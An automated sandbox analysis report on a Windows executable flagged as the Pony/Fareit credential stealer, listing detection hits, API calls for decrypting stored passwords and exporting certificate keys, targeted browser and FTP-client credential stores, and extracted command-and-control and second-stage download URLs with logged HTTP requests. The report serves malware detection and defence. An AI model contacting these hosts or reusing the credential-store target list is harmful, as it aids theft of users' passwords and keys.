Windows Analysis Report
BW38j8Jkbl.exe

AV Detection

Source: BW38j8Jkbl.exe

Avira: detected

Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack

Malware Configuration Extractor: Pony {"C2 list": ["http://smartoffice-eg.com/include/rili/gate.php", "http://smartoffice-eg.com/include/rili/shit.exe"]}

Source: BW38j8Jkbl.exe

ReversingLabs: Detection: 79%

Source: Yara match	File source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR

Source: BW38j8Jkbl.exe

Joe Sandbox ML: detected

Cryptography

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_0040A712 lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,		1_2_0040A712
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_0040D3BE CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,		1_2_0040D3BE
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_0040BC36 CryptUnprotectData,LocalFree,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,		1_2_0040BC36
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_0040A557 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,757283B0,		1_2_0040A557
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_0040A96D CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,		1_2_0040A96D
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_0040CE3D lstrlen,CryptUnprotectData,LocalFree,		1_2_0040CE3D
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_0040AB24 lstrlen,CryptUnprotectData,LocalFree,		1_2_0040AB24
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_004043DC CryptUnprotectData,LocalFree,		1_2_004043DC

Compliance

Source: BW38j8Jkbl.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Spreading

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_004051E3 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,		1_2_004051E3
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_004041A6 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,		1_2_004041A6
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_00404E73 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,		1_2_00404E73
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_00408AE5 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,		1_2_00408AE5
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_00409832 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,		1_2_00409832
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_00408961 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,		1_2_00408961

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\			Jump to behavior

Networking

Source: Traffic

Snort IDS: 2014562 ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98 192.168.2.4:49730 -> 144.76.41.117:80

Source: Malware configuration extractor	URLs: http://smartoffice-eg.com/include/rili/gate.php
Source: Malware configuration extractor	URLs: http://smartoffice-eg.com/include/rili/shit.exe

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: global traffic	HTTP traffic detected: GET /include/rili/shit.exe HTTP/1.0Host: smartoffice-eg.comAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: GET /include/rili/shit.exe HTTP/1.0Host: smartoffice-eg.comAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /include/rili/shit.exe HTTP/1.0Host: smartoffice-eg.comAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: GET /include/rili/shit.exe HTTP/1.0Host: smartoffice-eg.comAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Source: BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: BW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/abe2869f-9b47-4cd9-a358-c22904dba7f7Microsoft_WinInet_*ftp://Software\Adobe\CommonSiteServersSiteServer %d\HostSiteServer %d\WebUrlSiteServer %d\Remote DirectorySiteServer %d-UserSiteServer %d-User PW%s\KeychainSiteServer %d\SFTPDeluxeFTPsites.xmlWeb DataLogin DataSQLite format 3table() CONSTRAINTPRIMARYUNIQUECHECKFOREIGNloginsorigin_urlpassword_valueusername_valueftp://http://https://\Google\Chrome\Chromium\ChromePlusSoftware\ChromePlusInstall_Dir\Bromium\Nichrome\Comodo\RockMeltK-Meleon\K-Meleon\ProfilesEpic\Epic\EpicStaff-FTPsites.ini\Sites\Visicom Media.ftpSettings\Global DownloaderSM.archFreshFTP.SMFBlazeFtpsite.datLastPasswordLastAddressLastUserLastPortSoftware\FlashPeak\BlazeFtp\Settings\BlazeFtp.fplFTP++.Link\shell\open\commandGoFTPConnections.txt3D-FTPsites.ini\3D-FTP\SiteDesignerSOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32EasyFTP\NetSarang.xfp.rdpTERMSRV/*password 51:b:username:s:full address:s:.TERMSRV/FTP NowFTPNowsites.xmlSOFTWARE\Robo-FTP 3.7\ScriptsSOFTWARE\Robo-FTP 3.7\FTPServersFTP CountFTP File%dPasswordServerNameUserIDInitialDirectoryPortNumberServerType equals www.facebook.com (Facebook)
Source: BW38j8Jkbl.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: smartoffice-eg.com

Source: BW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
Source: BW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://https://ftp://operawand.dat_Software
Source: BW38j8Jkbl.exe, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://smartoffice-eg.com/include/rili/gate.php
Source: BW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://smartoffice-eg.com/include/rili/gate.phphttp://smartoffice-eg.com/include/rili/shit.exeYUIPWD
Source: BW38j8Jkbl.exe, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://smartoffice-eg.com/include/rili/shit.exe
Source: BW38j8Jkbl.exe, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BW38j8Jkbl.exe, 00000001.00000002.1811257857.0000000000638000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: BW38j8Jkbl.exe, 00000001.00000002.1811257857.0000000000638000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: BW38j8Jkbl.exe, 00000001.00000003.1802833837.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811257857.0000000000638000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://smartoffice-eg.com/include/rili/shit.exe
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443

E-Banking Fraud

Source: Yara match	File source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR

System Summary

Source: 0.2.BW38j8Jkbl.exe.4296000.1.unpack, type: UNPACKEDPE	Matched rule: Fareit Payload Author: kevoreilly
Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Fareit Payload Author: kevoreilly
Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Fareit Payload Author: kevoreilly
Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Fareit Payload Author: kevoreilly
Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Fareit Payload Author: kevoreilly
Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Fareit Payload Author: kevoreilly
Source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter

Source: Signatures Results

: All Signatures

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_004121E9		1_2_004121E9
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_00402EFD		1_2_00402EFD

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: String function: 00404351 appears 51 times
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: String function: 00401D71 appears 139 times
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: String function: 00410808 appears 42 times

Source: BW38j8Jkbl.exe, 00000000.00000000.1709686609.000000000049A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMesode7.exe vs BW38j8Jkbl.exe
Source: BW38j8Jkbl.exe, 00000001.00000000.1784937920.000000000049A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMesode7.exe vs BW38j8Jkbl.exe
Source: BW38j8Jkbl.exe	Binary or memory string: OriginalFilenameMesode7.exe vs BW38j8Jkbl.exe

Source: BW38j8Jkbl.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0.2.BW38j8Jkbl.exe.4296000.1.unpack, type: UNPACKEDPE	Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/1@1/1

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 1_2_0040D3BE CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,

1_2_0040D3BE

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 1_2_00402968 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,

1_2_00402968

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 1_2_00402CE7 WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle,

1_2_00402CE7

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1060:120:WilError_03

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

File created: C:\Users\user\AppData\Local\Temp\6000093.bat

Jump to behavior

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6000093.bat" "C:\Users\user\Desktop\BW38j8Jkbl.exe" "

Source: BW38j8Jkbl.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: BW38j8Jkbl.exe, 00000001.00000003.1791574250.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000003.1791503181.0000000000688000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: BW38j8Jkbl.exe

ReversingLabs: Detection: 79%

Source: unknown	Process created: C:\Users\user\Desktop\BW38j8Jkbl.exe "C:\Users\user\Desktop\BW38j8Jkbl.exe"
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process created: C:\Users\user\Desktop\BW38j8Jkbl.exe "C:\Users\user\Desktop\BW38j8Jkbl.exe"
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6000093.bat" "C:\Users\user\Desktop\BW38j8Jkbl.exe" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process created: C:\Users\user\Desktop\BW38j8Jkbl.exe "C:\Users\user\Desktop\BW38j8Jkbl.exe"			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6000093.bat" "C:\Users\user\Desktop\BW38j8Jkbl.exe" "			Jump to behavior

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: msvbvm60.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: vb6zz.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: sxs.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: wsock32.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: netapi32.dll			Jump to behavior
